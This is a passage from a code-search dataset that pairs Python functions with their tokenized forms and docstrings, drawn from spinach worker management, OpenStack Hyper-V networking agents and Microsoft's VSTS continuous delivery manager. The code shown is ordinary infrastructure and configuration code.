self._result_notifier.start()
# Start the arbiter
self._arbiter = threading.Thread(
target=run_forever,
args=(self._arbiter_func, self._must_stop, logger,
stop_when_queue_empty),
name='{}-arbiter'.format(self.namespace)
)
self._arbiter.start()
if block:
with handle_sigterm():
try:
self._arbiter.join()
except KeyboardInterrupt:
self.stop_workers()
except AttributeError:
# Arbiter thread starts and stops immediately when ran with
# `stop_when_queue_empty` and queue is already empty.
pass | [
"def",
"start_workers",
"(",
"self",
",",
"number",
":",
"int",
"=",
"DEFAULT_WORKER_NUMBER",
",",
"queue",
"=",
"DEFAULT_QUEUE",
",",
"block",
"=",
"True",
",",
"stop_when_queue_empty",
"=",
"False",
")",
":",
"if",
"self",
".",
"_arbiter",
"or",
"self",
".",
"_workers",
":",
"raise",
"RuntimeError",
"(",
"'Workers are already running'",
")",
"self",
".",
"_working_queue",
"=",
"queue",
"tasks_names",
"=",
"'\\n'",
".",
"join",
"(",
"[",
"' - '",
"+",
"task",
".",
"name",
"for",
"task",
"in",
"self",
".",
"_tasks",
".",
"tasks",
".",
"values",
"(",
")",
"if",
"task",
".",
"queue",
"==",
"self",
".",
"_working_queue",
"]",
")",
"logger",
".",
"info",
"(",
"'Starting %d workers on queue \"%s\" with tasks:\\n%s'",
",",
"number",
",",
"self",
".",
"_working_queue",
",",
"tasks_names",
")",
"# Start the broker",
"self",
".",
"_broker",
".",
"start",
"(",
")",
"# Start workers",
"self",
".",
"_workers",
"=",
"Workers",
"(",
"num_workers",
"=",
"number",
",",
"namespace",
"=",
"self",
".",
"namespace",
",",
")",
"# Start the result notifier",
"self",
".",
"_result_notifier",
"=",
"threading",
".",
"Thread",
"(",
"target",
"=",
"run_forever",
",",
"args",
"=",
"(",
"self",
".",
"_result_notifier_func",
",",
"self",
".",
"_must_stop",
",",
"logger",
")",
",",
"name",
"=",
"'{}-result-notifier'",
".",
"format",
"(",
"self",
".",
"namespace",
")",
")",
"self",
".",
"_result_notifier",
".",
"start",
"(",
")",
"# Start the arbiter",
"self",
".",
"_arbiter",
"=",
"threading",
".",
"Thread",
"(",
"target",
"=",
"run_forever",
",",
"args",
"=",
"(",
"self",
".",
"_arbiter_func",
",",
"self",
".",
"_must_stop",
",",
"logger",
",",
"stop_when_queue_empty",
")",
",",
"name",
"=",
"'{}-arbiter'",
".",
"format",
"(",
"self",
".",
"namespace",
")",
")",
"self",
".",
"_arbiter",
".",
"start",
"(",
")",
"if",
"block",
":",
"with",
"handle_sigterm",
"(",
")",
":",
"try",
":",
"self",
".",
"_arbiter",
".",
"join",
"(",
")",
"except",
"KeyboardInterrupt",
":",
"self",
".",
"stop_workers",
"(",
")",
"except",
"AttributeError",
":",
"# Arbiter thread starts and stops immediately when ran with",
"# `stop_when_queue_empty` and queue is already empty.",
"pass"
] | Start the worker threads.
:arg number: number of worker threads to launch
:arg queue: name of the queue to consume, see :doc:`queues`
:arg block: whether to block the calling thread until a signal arrives
and workers get terminated
:arg stop_when_queue_empty: automatically stop the workers when the
queue is empty. Useful mostly for one-off scripts and testing. | [
"Start",
"the",
"worker",
"threads",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L148-L207 |
NicolasLM/spinach | spinach/engine.py | Engine.stop_workers | def stop_workers(self, _join_arbiter=True):
"""Stop the workers and wait for them to terminate."""
# _join_arbiter is used internally when the arbiter is shutting down
# the full engine itself. This is because the arbiter thread cannot
# join itself.
self._must_stop.set()
self._workers.stop()
self._result_notifier.join()
self._broker.stop()
if _join_arbiter:
self._arbiter.join()
self._reset() | python | def stop_workers(self, _join_arbiter=True):
"""Stop the workers and wait for them to terminate."""
# _join_arbiter is used internally when the arbiter is shutting down
# the full engine itself. This is because the arbiter thread cannot
# join itself.
self._must_stop.set()
self._workers.stop()
self._result_notifier.join()
self._broker.stop()
if _join_arbiter:
self._arbiter.join()
self._reset() | [
"def",
"stop_workers",
"(",
"self",
",",
"_join_arbiter",
"=",
"True",
")",
":",
"# _join_arbiter is used internally when the arbiter is shutting down",
"# the full engine itself. This is because the arbiter thread cannot",
"# join itself.",
"self",
".",
"_must_stop",
".",
"set",
"(",
")",
"self",
".",
"_workers",
".",
"stop",
"(",
")",
"self",
".",
"_result_notifier",
".",
"join",
"(",
")",
"self",
".",
"_broker",
".",
"stop",
"(",
")",
"if",
"_join_arbiter",
":",
"self",
".",
"_arbiter",
".",
"join",
"(",
")",
"self",
".",
"_reset",
"(",
")"
] | Stop the workers and wait for them to terminate. | [
"Stop",
"the",
"workers",
"and",
"wait",
"for",
"them",
"to",
"terminate",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L209-L220 |
openstack/networking-hyperv | networking_hyperv/neutron/trunk_driver.py | HyperVTrunkDriver.handle_trunks | def handle_trunks(self, trunks, event_type):
"""Trunk data model change from the server."""
LOG.debug("Trunks event received: %(event_type)s. Trunks: %(trunks)s",
{'event_type': event_type, 'trunks': trunks})
if event_type == events.DELETED:
# The port trunks have been deleted. Remove them from cache.
for trunk in trunks:
self._trunks.pop(trunk.id, None)
else:
for trunk in trunks:
self._trunks[trunk.id] = trunk
self._setup_trunk(trunk) | python | def handle_trunks(self, trunks, event_type):
"""Trunk data model change from the server."""
LOG.debug("Trunks event received: %(event_type)s. Trunks: %(trunks)s",
{'event_type': event_type, 'trunks': trunks})
if event_type == events.DELETED:
# The port trunks have been deleted. Remove them from cache.
for trunk in trunks:
self._trunks.pop(trunk.id, None)
else:
for trunk in trunks:
self._trunks[trunk.id] = trunk
self._setup_trunk(trunk) | [
"def",
"handle_trunks",
"(",
"self",
",",
"trunks",
",",
"event_type",
")",
":",
"LOG",
".",
"debug",
"(",
"\"Trunks event received: %(event_type)s. Trunks: %(trunks)s\"",
",",
"{",
"'event_type'",
":",
"event_type",
",",
"'trunks'",
":",
"trunks",
"}",
")",
"if",
"event_type",
"==",
"events",
".",
"DELETED",
":",
"# The port trunks have been deleted. Remove them from cache.",
"for",
"trunk",
"in",
"trunks",
":",
"self",
".",
"_trunks",
".",
"pop",
"(",
"trunk",
".",
"id",
",",
"None",
")",
"else",
":",
"for",
"trunk",
"in",
"trunks",
":",
"self",
".",
"_trunks",
"[",
"trunk",
".",
"id",
"]",
"=",
"trunk",
"self",
".",
"_setup_trunk",
"(",
"trunk",
")"
] | Trunk data model change from the server. | [
"Trunk",
"data",
"model",
"change",
"from",
"the",
"server",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/trunk_driver.py#L46-L59 |
openstack/networking-hyperv | networking_hyperv/neutron/trunk_driver.py | HyperVTrunkDriver.handle_subports | def handle_subports(self, subports, event_type):
"""Subport data model change from the server."""
LOG.debug("Subports event received: %(event_type)s. "
"Subports: %(subports)s",
{'event_type': event_type, 'subports': subports})
# update the cache.
if event_type == events.CREATED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk:
trunk.sub_ports.append(subport)
elif event_type == events.DELETED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk and subport in trunk.sub_ports:
trunk.sub_ports.remove(subport)
# update the bound trunks.
affected_trunk_ids = set([s['trunk_id'] for s in subports])
for trunk_id in affected_trunk_ids:
trunk = self._trunks.get(trunk_id)
if trunk:
self._setup_trunk(trunk) | python | def handle_subports(self, subports, event_type):
"""Subport data model change from the server."""
LOG.debug("Subports event received: %(event_type)s. "
"Subports: %(subports)s",
{'event_type': event_type, 'subports': subports})
# update the cache.
if event_type == events.CREATED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk:
trunk.sub_ports.append(subport)
elif event_type == events.DELETED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk and subport in trunk.sub_ports:
trunk.sub_ports.remove(subport)
# update the bound trunks.
affected_trunk_ids = set([s['trunk_id'] for s in subports])
for trunk_id in affected_trunk_ids:
trunk = self._trunks.get(trunk_id)
if trunk:
self._setup_trunk(trunk) | [
"def",
"handle_subports",
"(",
"self",
",",
"subports",
",",
"event_type",
")",
":",
"LOG",
".",
"debug",
"(",
"\"Subports event received: %(event_type)s. \"",
"\"Subports: %(subports)s\"",
",",
"{",
"'event_type'",
":",
"event_type",
",",
"'subports'",
":",
"subports",
"}",
")",
"# update the cache.",
"if",
"event_type",
"==",
"events",
".",
"CREATED",
":",
"for",
"subport",
"in",
"subports",
":",
"trunk",
"=",
"self",
".",
"_trunks",
".",
"get",
"(",
"subport",
"[",
"'trunk_id'",
"]",
")",
"if",
"trunk",
":",
"trunk",
".",
"sub_ports",
".",
"append",
"(",
"subport",
")",
"elif",
"event_type",
"==",
"events",
".",
"DELETED",
":",
"for",
"subport",
"in",
"subports",
":",
"trunk",
"=",
"self",
".",
"_trunks",
".",
"get",
"(",
"subport",
"[",
"'trunk_id'",
"]",
")",
"if",
"trunk",
"and",
"subport",
"in",
"trunk",
".",
"sub_ports",
":",
"trunk",
".",
"sub_ports",
".",
"remove",
"(",
"subport",
")",
"# update the bound trunks.",
"affected_trunk_ids",
"=",
"set",
"(",
"[",
"s",
"[",
"'trunk_id'",
"]",
"for",
"s",
"in",
"subports",
"]",
")",
"for",
"trunk_id",
"in",
"affected_trunk_ids",
":",
"trunk",
"=",
"self",
".",
"_trunks",
".",
"get",
"(",
"trunk_id",
")",
"if",
"trunk",
":",
"self",
".",
"_setup_trunk",
"(",
"trunk",
")"
] | Subport data model change from the server. | [
"Subport",
"data",
"model",
"change",
"from",
"the",
"server",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/trunk_driver.py#L61-L85 |
openstack/networking-hyperv | networking_hyperv/neutron/trunk_driver.py | HyperVTrunkDriver._setup_trunk | def _setup_trunk(self, trunk, vlan_id=None):
"""Sets up VLAN trunk and updates the trunk status."""
LOG.info('Binding trunk port: %s.', trunk)
try:
# bind sub_ports to host.
self._trunk_rpc.update_subport_bindings(self._context,
trunk.sub_ports)
vlan_trunk = [s.segmentation_id for s in trunk.sub_ports]
self._set_port_vlan(trunk.port_id, vlan_id, vlan_trunk)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.ACTIVE_STATUS)
except Exception:
# something broke
LOG.exception("Failure setting up subports for %s", trunk.port_id)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.DEGRADED_STATUS) | python | def _setup_trunk(self, trunk, vlan_id=None):
"""Sets up VLAN trunk and updates the trunk status."""
LOG.info('Binding trunk port: %s.', trunk)
try:
# bind sub_ports to host.
self._trunk_rpc.update_subport_bindings(self._context,
trunk.sub_ports)
vlan_trunk = [s.segmentation_id for s in trunk.sub_ports]
self._set_port_vlan(trunk.port_id, vlan_id, vlan_trunk)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.ACTIVE_STATUS)
except Exception:
# something broke
LOG.exception("Failure setting up subports for %s", trunk.port_id)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.DEGRADED_STATUS) | [
"def",
"_setup_trunk",
"(",
"self",
",",
"trunk",
",",
"vlan_id",
"=",
"None",
")",
":",
"LOG",
".",
"info",
"(",
"'Binding trunk port: %s.'",
",",
"trunk",
")",
"try",
":",
"# bind sub_ports to host.",
"self",
".",
"_trunk_rpc",
".",
"update_subport_bindings",
"(",
"self",
".",
"_context",
",",
"trunk",
".",
"sub_ports",
")",
"vlan_trunk",
"=",
"[",
"s",
".",
"segmentation_id",
"for",
"s",
"in",
"trunk",
".",
"sub_ports",
"]",
"self",
".",
"_set_port_vlan",
"(",
"trunk",
".",
"port_id",
",",
"vlan_id",
",",
"vlan_trunk",
")",
"self",
".",
"_trunk_rpc",
".",
"update_trunk_status",
"(",
"self",
".",
"_context",
",",
"trunk",
".",
"id",
",",
"t_const",
".",
"ACTIVE_STATUS",
")",
"except",
"Exception",
":",
"# something broke",
"LOG",
".",
"exception",
"(",
"\"Failure setting up subports for %s\"",
",",
"trunk",
".",
"port_id",
")",
"self",
".",
"_trunk_rpc",
".",
"update_trunk_status",
"(",
"self",
".",
"_context",
",",
"trunk",
".",
"id",
",",
"t_const",
".",
"DEGRADED_STATUS",
")"
] | Sets up VLAN trunk and updates the trunk status. | [
"Sets",
"up",
"VLAN",
"trunk",
"and",
"updates",
"the",
"trunk",
"status",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/trunk_driver.py#L115-L133 |
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | main | def main():
"""The entry point for neutron-hnv-metadata-proxy."""
register_config_opts()
common_config.init(sys.argv[1:])
neutron_config.setup_logging()
proxy = MetadataProxy()
proxy.run() | python | def main():
"""The entry point for neutron-hnv-metadata-proxy."""
register_config_opts()
common_config.init(sys.argv[1:])
neutron_config.setup_logging()
proxy = MetadataProxy()
proxy.run() | [
"def",
"main",
"(",
")",
":",
"register_config_opts",
"(",
")",
"common_config",
".",
"init",
"(",
"sys",
".",
"argv",
"[",
"1",
":",
"]",
")",
"neutron_config",
".",
"setup_logging",
"(",
")",
"proxy",
"=",
"MetadataProxy",
"(",
")",
"proxy",
".",
"run",
"(",
")"
] | The entry point for neutron-hnv-metadata-proxy. | [
"The",
"entry",
"point",
"for",
"neutron",
"-",
"hnv",
"-",
"metadata",
"-",
"proxy",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L227-L233 |
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | _MetadataProxyHandler._get_port_profile_id | def _get_port_profile_id(self, request):
"""Get the port profile ID from the request path."""
# Note(alexcoman): The port profile ID can be found as suffix
# in request path.
port_profile_id = request.path.split("/")[-1].strip()
if uuidutils.is_uuid_like(port_profile_id):
LOG.debug("The instance id was found in request path.")
return port_profile_id
LOG.debug("Failed to get the instance id from the request.")
return None | python | def _get_port_profile_id(self, request):
"""Get the port profile ID from the request path."""
# Note(alexcoman): The port profile ID can be found as suffix
# in request path.
port_profile_id = request.path.split("/")[-1].strip()
if uuidutils.is_uuid_like(port_profile_id):
LOG.debug("The instance id was found in request path.")
return port_profile_id
LOG.debug("Failed to get the instance id from the request.")
return None | [
"def",
"_get_port_profile_id",
"(",
"self",
",",
"request",
")",
":",
"# Note(alexcoman): The port profile ID can be found as suffix",
"# in request path.",
"port_profile_id",
"=",
"request",
".",
"path",
".",
"split",
"(",
"\"/\"",
")",
"[",
"-",
"1",
"]",
".",
"strip",
"(",
")",
"if",
"uuidutils",
".",
"is_uuid_like",
"(",
"port_profile_id",
")",
":",
"LOG",
".",
"debug",
"(",
"\"The instance id was found in request path.\"",
")",
"return",
"port_profile_id",
"LOG",
".",
"debug",
"(",
"\"Failed to get the instance id from the request.\"",
")",
"return",
"None"
] | Get the port profile ID from the request path. | [
"Get",
"the",
"port",
"profile",
"ID",
"from",
"the",
"request",
"path",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L63-L74 |
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | MetadataProxy._setup_rpc | def _setup_rpc(self):
"""Setup the RPC client for the current agent."""
self._state_rpc = agent_rpc.PluginReportStateAPI(topics.REPORTS)
report_interval = CONF.AGENT.report_interval
if report_interval:
heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
heartbeat.start(interval=report_interval) | python | def _setup_rpc(self):
"""Setup the RPC client for the current agent."""
self._state_rpc = agent_rpc.PluginReportStateAPI(topics.REPORTS)
report_interval = CONF.AGENT.report_interval
if report_interval:
heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
heartbeat.start(interval=report_interval) | [
"def",
"_setup_rpc",
"(",
"self",
")",
":",
"self",
".",
"_state_rpc",
"=",
"agent_rpc",
".",
"PluginReportStateAPI",
"(",
"topics",
".",
"REPORTS",
")",
"report_interval",
"=",
"CONF",
".",
"AGENT",
".",
"report_interval",
"if",
"report_interval",
":",
"heartbeat",
"=",
"loopingcall",
".",
"FixedIntervalLoopingCall",
"(",
"self",
".",
"_report_state",
")",
"heartbeat",
".",
"start",
"(",
"interval",
"=",
"report_interval",
")"
] | Setup the RPC client for the current agent. | [
"Setup",
"the",
"RPC",
"client",
"for",
"the",
"current",
"agent",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L186-L193 |
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | MetadataProxy._work | def _work(self):
"""Start the neutron-hnv-metadata-proxy agent."""
server = wsgi.Server(
name=self._AGENT_BINARY,
num_threads=CONF.AGENT.worker_count)
server.start(
application=_MetadataProxyHandler(),
port=CONF.bind_port,
host=CONF.bind_host)
server.wait() | python | def _work(self):
"""Start the neutron-hnv-metadata-proxy agent."""
server = wsgi.Server(
name=self._AGENT_BINARY,
num_threads=CONF.AGENT.worker_count)
server.start(
application=_MetadataProxyHandler(),
port=CONF.bind_port,
host=CONF.bind_host)
server.wait() | [
"def",
"_work",
"(",
"self",
")",
":",
"server",
"=",
"wsgi",
".",
"Server",
"(",
"name",
"=",
"self",
".",
"_AGENT_BINARY",
",",
"num_threads",
"=",
"CONF",
".",
"AGENT",
".",
"worker_count",
")",
"server",
".",
"start",
"(",
"application",
"=",
"_MetadataProxyHandler",
"(",
")",
",",
"port",
"=",
"CONF",
".",
"bind_port",
",",
"host",
"=",
"CONF",
".",
"bind_host",
")",
"server",
".",
"wait",
"(",
")"
] | Start the neutron-hnv-metadata-proxy agent. | [
"Start",
"the",
"neutron",
"-",
"hnv",
"-",
"metadata",
"-",
"proxy",
"agent",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L202-L211 |
Microsoft/vsts-cd-manager | vsts_cd_manager/continuous_delivery_manager.py | ContinuousDeliveryManager.set_azure_web_info | def set_azure_web_info(self, resource_group_name, website_name, credentials,
subscription_id, subscription_name, tenant_id, webapp_location):
"""
Call this method before attempting to setup continuous delivery to setup the azure settings
:param resource_group_name:
:param website_name:
:param credentials:
:param subscription_id:
:param subscription_name:
:param tenant_id:
:param webapp_location:
:return:
"""
self._azure_info.resource_group_name = resource_group_name
self._azure_info.website_name = website_name
self._azure_info.credentials = credentials
self._azure_info.subscription_id = subscription_id
self._azure_info.subscription_name = subscription_name
self._azure_info.tenant_id = tenant_id
self._azure_info.webapp_location = webapp_location | python | def set_azure_web_info(self, resource_group_name, website_name, credentials,
subscription_id, subscription_name, tenant_id, webapp_location):
"""
Call this method before attempting to setup continuous delivery to setup the azure settings
:param resource_group_name:
:param website_name:
:param credentials:
:param subscription_id:
:param subscription_name:
:param tenant_id:
:param webapp_location:
:return:
"""
self._azure_info.resource_group_name = resource_group_name
self._azure_info.website_name = website_name
self._azure_info.credentials = credentials
self._azure_info.subscription_id = subscription_id
self._azure_info.subscription_name = subscription_name
self._azure_info.tenant_id = tenant_id
self._azure_info.webapp_location = webapp_location | [
"def",
"set_azure_web_info",
"(",
"self",
",",
"resource_group_name",
",",
"website_name",
",",
"credentials",
",",
"subscription_id",
",",
"subscription_name",
",",
"tenant_id",
",",
"webapp_location",
")",
":",
"self",
".",
"_azure_info",
".",
"resource_group_name",
"=",
"resource_group_name",
"self",
".",
"_azure_info",
".",
"website_name",
"=",
"website_name",
"self",
".",
"_azure_info",
".",
"credentials",
"=",
"credentials",
"self",
".",
"_azure_info",
".",
"subscription_id",
"=",
"subscription_id",
"self",
".",
"_azure_info",
".",
"subscription_name",
"=",
"subscription_name",
"self",
".",
"_azure_info",
".",
"tenant_id",
"=",
"tenant_id",
"self",
".",
"_azure_info",
".",
"webapp_location",
"=",
"webapp_location"
] | Call this method before attempting to setup continuous delivery to setup the azure settings
:param resource_group_name:
:param website_name:
:param credentials:
:param subscription_id:
:param subscription_name:
:param tenant_id:
:param webapp_location:
:return: | [
"Call",
"this",
"method",
"before",
"attempting",
"to",
"setup",
"continuous",
"delivery",
"to",
"setup",
"the",
"azure",
"settings",
":",
"param",
"resource_group_name",
":",
":",
"param",
"website_name",
":",
":",
"param",
"credentials",
":",
":",
"param",
"subscription_id",
":",
":",
"param",
"subscription_name",
":",
":",
"param",
"tenant_id",
":",
":",
"param",
"webapp_location",
":",
":",
"return",
":"
] | train | https://github.com/Microsoft/vsts-cd-manager/blob/2649d236be94d119b13e0ac607964c94a9e51fde/vsts_cd_manager/continuous_delivery_manager.py#L42-L61 |
Microsoft/vsts-cd-manager | vsts_cd_manager/continuous_delivery_manager.py | ContinuousDeliveryManager.set_repository_info | def set_repository_info(self, repo_url, branch, git_token, private_repo_username, private_repo_password):
"""
Call this method before attempting to setup continuous delivery to setup the source control settings
:param repo_url: URL of the code repo
:param branch: repo branch
:param git_token: git token
:param private_repo_username: private repo username
:param private_repo_password: private repo password
:return:
"""
self._repo_info.url = repo_url
self._repo_info.branch = branch
self._repo_info.git_token = git_token
self._repo_info._private_repo_username = private_repo_username
self._repo_info._private_repo_password = private_repo_password | python | def set_repository_info(self, repo_url, branch, git_token, private_repo_username, private_repo_password):
"""
Call this method before attempting to setup continuous delivery to setup the source control settings
:param repo_url: URL of the code repo
:param branch: repo branch
:param git_token: git token
:param private_repo_username: private repo username
:param private_repo_password: private repo password
:return:
"""
self._repo_info.url = repo_url
self._repo_info.branch = branch
self._repo_info.git_token = git_token
self._repo_info._private_repo_username = private_repo_username
self._repo_info._private_repo_password = private_repo_password | [
"def",
"set_repository_info",
"(",
"self",
",",
"repo_url",
",",
"branch",
",",
"git_token",
",",
"private_repo_username",
",",
"private_repo_password",
")",
":",
"self",
".",
"_repo_info",
".",
"url",
"=",
"repo_url",
"self",
".",
"_repo_info",
".",
"branch",
"=",
"branch",
"self",
".",
"_repo_info",
".",
"git_token",
"=",
"git_token",
"self",
".",
"_repo_info",
".",
"_private_repo_username",
"=",
"private_repo_username",
"self",
".",
"_repo_info",
".",
"_private_repo_password",
"=",
"private_repo_password"
] | Call this method before attempting to setup continuous delivery to setup the source control settings
:param repo_url: URL of the code repo
:param branch: repo branch
:param git_token: git token
:param private_repo_username: private repo username
:param private_repo_password: private repo password
:return: | [
"Call",
"this",
"method",
"before",
"attempting",
"to",
"setup",
"continuous",
"delivery",
"to",
"setup",
"the",
"source",
"control",
"settings",
":",
"param",
"repo_url",
":",
"URL",
"of",
"the",
"code",
"repo",
":",
"param",
"branch",
":",
"repo",
"branch",
":",
"param",
"git_token",
":",
"git",
"token",
":",
"param",
"private_repo_username",
":",
"private",
"repo",
"username",
":",
"param",
"private_repo_password",
":",
"private",
"repo",
"password",
":",
"return",
":"
] | train | https://github.com/Microsoft/vsts-cd-manager/blob/2649d236be94d119b13e0ac607964c94a9e51fde/vsts_cd_manager/continuous_delivery_manager.py#L63-L77 |
Microsoft/vsts-cd-manager | vsts_cd_manager/continuous_delivery_manager.py | ContinuousDeliveryManager.setup_continuous_delivery | def setup_continuous_delivery(self, swap_with_slot, app_type_details, cd_project_url, create_account,
vsts_app_auth_token, test, webapp_list):
"""
Use this method to setup Continuous Delivery of an Azure web site from a source control repository.
:param swap_with_slot: the slot to use for deployment
:param app_type_details: the details of app that will be deployed. i.e. app_type = Python, python_framework = Django etc.
:param cd_project_url: CD Project url in the format of https://<accountname>.visualstudio.com/<projectname>
:param create_account: Boolean value to decide if account need to be created or not
:param vsts_app_auth_token: Authentication token for vsts app
:param test: Load test webapp name
:param webapp_list: Existing webapp list
:return: a message indicating final status and instructions for the user
"""
branch = self._repo_info.branch or 'refs/heads/master'
self._validate_cd_project_url(cd_project_url)
vsts_account_name = self._get_vsts_account_name(cd_project_url)
# Verify inputs before we start generating tokens
source_repository, account_name, team_project_name = self._get_source_repository(self._repo_info.url,
self._repo_info.git_token, branch, self._azure_info.credentials,
self._repo_info._private_repo_username, self._repo_info._private_repo_password)
self._verify_vsts_parameters(vsts_account_name, source_repository)
vsts_account_name = vsts_account_name or account_name
cd_project_name = team_project_name or self._azure_info.website_name
account_url = 'https://{}.visualstudio.com'.format(quote(vsts_account_name))
portalext_account_url = 'https://{}.portalext.visualstudio.com'.format(quote(vsts_account_name))
# VSTS Account using AEX APIs
account_created = False
if create_account:
self.create_vsts_account(self._azure_info.credentials, vsts_account_name)
account_created = True
# Create ContinuousDelivery client
cd = ContinuousDelivery('3.2-preview.1', portalext_account_url, self._azure_info.credentials)
# Construct the config body of the continuous delivery call
build_configuration = self._get_build_configuration(app_type_details)
source = ProvisioningConfigurationSource('codeRepository', source_repository, build_configuration)
auth_info = AuthorizationInfo('Headers', AuthorizationInfoParameters('Bearer ' + vsts_app_auth_token))
target = self.get_provisioning_configuration_target(auth_info, swap_with_slot, test, webapp_list)
ci_config = CiConfiguration(CiArtifact(name=cd_project_name))
config = ProvisioningConfiguration(None, source, target, ci_config)
# Configure the continuous deliver using VSTS as a backend
response = cd.provisioning_configuration(config)
if response.ci_configuration.result.status == 'queued':
final_status = self._wait_for_cd_completion(cd, response)
return self._get_summary(final_status, account_url, vsts_account_name, account_created, self._azure_info.subscription_id,
self._azure_info.resource_group_name, self._azure_info.website_name)
else:
raise RuntimeError('Unknown status returned from provisioning_configuration: ' + response.ci_configuration.result.status) | python | def setup_continuous_delivery(self, swap_with_slot, app_type_details, cd_project_url, create_account,
vsts_app_auth_token, test, webapp_list):
"""
Use this method to setup Continuous Delivery of an Azure web site from a source control repository.
:param swap_with_slot: the slot to use for deployment
:param app_type_details: the details of app that will be deployed. i.e. app_type = Python, python_framework = Django etc.
:param cd_project_url: CD Project url in the format of https://<accountname>.visualstudio.com/<projectname>
:param create_account: Boolean value to decide if account need to be created or not
:param vsts_app_auth_token: Authentication token for vsts app
:param test: Load test webapp name
:param webapp_list: Existing webapp list
:return: a message indicating final status and instructions for the user
"""
branch = self._repo_info.branch or 'refs/heads/master'
self._validate_cd_project_url(cd_project_url)
vsts_account_name = self._get_vsts_account_name(cd_project_url)
# Verify inputs before we start generating tokens
source_repository, account_name, team_project_name = self._get_source_repository(self._repo_info.url,
self._repo_info.git_token, branch, self._azure_info.credentials,
self._repo_info._private_repo_username, self._repo_info._private_repo_password)
self._verify_vsts_parameters(vsts_account_name, source_repository)
vsts_account_name = vsts_account_name or account_name
cd_project_name = team_project_name or self._azure_info.website_name
account_url = 'https://{}.visualstudio.com'.format(quote(vsts_account_name))
portalext_account_url = 'https://{}.portalext.visualstudio.com'.format(quote(vsts_account_name))
# VSTS Account using AEX APIs
account_created = False
if create_account:
self.create_vsts_account(self._azure_info.credentials, vsts_account_name)
account_created = True
# Create ContinuousDelivery client
cd = ContinuousDelivery('3.2-preview.1', portalext_account_url, self._azure_info.credentials)
# Construct the config body of the continuous delivery call
build_configuration = self._get_build_configuration(app_type_details)
source = ProvisioningConfigurationSource('codeRepository', source_repository, build_configuration)
auth_info = AuthorizationInfo('Headers', AuthorizationInfoParameters('Bearer ' + vsts_app_auth_token))
target = self.get_provisioning_configuration_target(auth_info, swap_with_slot, test, webapp_list)
ci_config = CiConfiguration(CiArtifact(name=cd_project_name))
config = ProvisioningConfiguration(None, source, target, ci_config)
# Configure the continuous deliver using VSTS as a backend
response = cd.provisioning_configuration(config)
if response.ci_configuration.result.status == 'queued':
final_status = self._wait_for_cd_completion(cd, response)
return self._get_summary(final_status, account_url, vsts_account_name, account_created, self._azure_info.subscription_id,
self._azure_info.resource_group_name, self._azure_info.website_name)
else:
raise RuntimeError('Unknown status returned from provisioning_configuration: ' + response.ci_configuration.result.status) | [
"def",
"setup_continuous_delivery",
"(",
"self",
",",
"swap_with_slot",
",",
"app_type_details",
",",
"cd_project_url",
",",
"create_account",
",",
"vsts_app_auth_token",
",",
"test",
",",
"webapp_list",
")",
":",
"branch",
"=",
"self",
".",
"_repo_info",
".",
"branch",
"or",
"'refs/heads/master'",
"self",
".",
"_validate_cd_project_url",
"(",
"cd_project_url",
")",
"vsts_account_name",
"=",
"self",
".",
"_get_vsts_account_name",
"(",
"cd_project_url",
")",
"# Verify inputs before we start generating tokens",
"source_repository",
",",
"account_name",
",",
"team_project_name",
"=",
"self",
".",
"_get_source_repository",
"(",
"self",
".",
"_repo_info",
".",
"url",
",",
"self",
".",
"_repo_info",
".",
"git_token",
",",
"branch",
",",
"self",
".",
"_azure_info",
".",
"credentials",
",",
"self",
".",
"_repo_info",
".",
"_private_repo_username",
",",
"self",
".",
"_repo_info",
".",
"_private_repo_password",
")",
"self",
".",
"_verify_vsts_parameters",
"(",
"vsts_account_name",
",",
"source_repository",
")",
"vsts_account_name",
"=",
"vsts_account_name",
"or",
"account_name",
"cd_project_name",
"=",
"team_project_name",
"or",
"self",
".",
"_azure_info",
".",
"website_name",
"account_url",
"=",
"'https://{}.visualstudio.com'",
".",
"format",
"(",
"quote",
"(",
"vsts_account_name",
")",
")",
"portalext_account_url",
"=",
"'https://{}.portalext.visualstudio.com'",
".",
"format",
"(",
"quote",
"(",
"vsts_account_name",
")",
")",
"# VSTS Account using AEX APIs",
"account_created",
"=",
"False",
"if",
"create_account",
":",
"self",
".",
"create_vsts_account",
"(",
"self",
".",
"_azure_info",
".",
"credentials",
",",
"vsts_account_name",
")",
"account_created",
"=",
"True",
"# Create ContinuousDelivery client",
"cd",
"=",
"ContinuousDelivery",
"(",
"'3.2-preview.1'",
",",
"portalext_account_url",
",",
"self",
".",
"_azure_info",
".",
"credentials",
")",
